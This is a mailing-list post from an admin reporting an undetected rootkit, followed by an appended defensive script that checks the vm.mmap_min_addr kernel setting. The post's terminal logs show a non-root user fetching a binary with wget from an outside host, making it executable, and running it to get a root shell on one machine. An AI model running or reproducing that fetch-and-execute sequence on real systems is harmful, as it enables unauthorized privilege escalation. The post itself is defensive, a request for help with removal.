I am running Debian testing, 2.6.30 kernel. I have a rootkit installed on a bunch of machines that rkhunter does not find. This appears after infection with SHV4 / SHV5, which rkhunter found.
Here it works to allow a non-root user to become root:

kric...@fricka:~$ mkdir a
kric...@fricka:~$ cd a
kric...@fricka:~/a$ ls -l
total 0
kric...@fricka:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:47:42--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       6.88K/s   in 1.0s

2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]

kric...@fricka:~/a$ chmod 777 a
kric...@fricka:~/a$ ./a
r...@fricka:~/a#

Here is a situation where it does not work:

kric...@chichek:~$ mkdir a
kric...@chichek:~$ cd a
kric...@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       37.8K/s   in 0.2s

2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]

kric...@chichek:~/a$ chmod 777 a
kric...@chichek:~/a$ ./a
mmap: Permission denied

Does anybody here know how to delete this kit?

Cheers,

Thomas Krichel                    http://openlib.org/home/krichel
RePEc:per:1965-06-05:thomas_krichel
skype: thomaskrichel
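The post does not say why the same binary escalates on one host and fails with "mmap: Permission denied" on the other. One kernel setting a defender would check first on a 2.6.30-era Debian box is vm.mmap_min_addr, which refuses user mappings of low addresses and so blocks a whole class of NULL-pointer-dereference privilege escalations. Whether that sysctl is what stopped the second host is an assumption, not something the post establishes. The script below is an added example, not code from the original post; it reads /proc/sys/vm/mmap_min_addr and reports whether the protection is active, and the 4096-byte threshold for "hardened" is a constructed minimum (Debian kernels of that period shipped 65536).

```shell
#!/bin/sh
# Added example (not from the original post): report whether the kernel's
# vm.mmap_min_addr protection is in force. It is an ASSUMPTION that the
# "mmap: Permission denied" seen on the second host is this sysctl refusing
# a low mapping; the post itself does not say why the binary failed there.

# classify_mmap_min_addr VALUE
#   prints "hardened" (>= 4096), "weak" (< 4096, 0 disables the check) or
#   "unknown" (not a number). Exit status mirrors the verdict.
classify_mmap_min_addr() {
    value="$1"
    case "$value" in
        ''|*[!0-9]*) echo "unknown"; return 2 ;;
    esac
    # 4096 is a constructed floor: at least page zero must be unmappable.
    if [ "$value" -ge 4096 ]; then
        echo "hardened"
        return 0
    fi
    echo "weak"
    return 1
}

# read_mmap_min_addr
#   prints the running kernel's value, or "missing" when the file is absent
#   (very old kernel, or a non-Linux system).
read_mmap_min_addr() {
    if [ -r /proc/sys/vm/mmap_min_addr ]; then
        cat /proc/sys/vm/mmap_min_addr
    else
        echo "missing"
    fi
}

# report_mmap_min_addr
#   one status line for the running kernel; exit 0 only when hardened.
report_mmap_min_addr() {
    current="$(read_mmap_min_addr)"
    verdict="$(classify_mmap_min_addr "$current")"
    echo "vm.mmap_min_addr=$current ($verdict)"
    case "$verdict" in
        hardened) return 0 ;;
        *) return 1 ;;
    esac
}

# Run the report when executed directly; "|| :" keeps a weak verdict from
# aborting a caller that sources this file under set -e.
report_mmap_min_addr || :
```

A "weak" verdict is a reason to set vm.mmap_min_addr (via sysctl) and to look harder at that host; a "hardened" verdict only rules out one mitigation being absent and says nothing about whether a kit is already installed, so it does not replace an integrity check of the installed binaries.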

